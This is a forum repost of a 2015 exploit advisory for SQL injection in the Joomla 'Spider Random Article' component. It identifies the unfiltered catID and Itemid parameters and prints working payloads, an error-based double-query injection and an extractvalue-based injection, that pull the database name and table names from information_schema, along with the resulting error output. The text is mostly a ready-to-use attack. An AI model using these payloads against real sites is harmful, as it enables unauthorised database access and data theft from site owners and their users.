Jump to content
Sign in to follow this  
KhiZaRix

Joomla Spider Random Article SQL Injection

Recommended Posts

##################################################################################################

#Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability

#Author : Jagriti Sahu AKA Incredible

#Vendor Link : Joomla Random Article Demo-Web Dorado

#Date : 22/03/2015

#Discovered at : IndiShell Lab

#Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^

##################################################################################################

////////////////////////

/// Overview:

////////////////////////

joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters

and hence affected by SQL injection vulnerability

///////////////////////////////

// Vulnerability Description:

///////////////////////////////

vulnerability is due to catID and Itemid parameter

////////////////

/// POC ////

///////////////

SQL Injection in catID parameter

=================================

Use error based double query injection with catID parameter

Injected Link--->

Joomla Form Maker Demo-Web-Dorado

Like error based double query injection for exploiting username --->

Error: 500 View not found [name, type, prefix]: randomarticle, html, randomarticleView' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13

POC Image URL--->

Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting

SQL Injection in Itemid parameter

=================================

Itemid Parameter is exploitable using xpath injection

Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '***%' OR items='all'' at line 1 SQL=SELECT * FROM vmvxw_spiderfacebook_params WHERE items LIKE '%***13' extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -

POC Image URL--->

http://tinypic.com/view.php?pic=1239z5h&s=8#.VRG97OESHIU

###################################################################################################

--==[[special Thanks to]]==--

# Manish Kishan Tanwar ^_^ #

Source: http://dl.packetstormsecurity.net/1503-exploits/joomlasrac-sql.txt

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...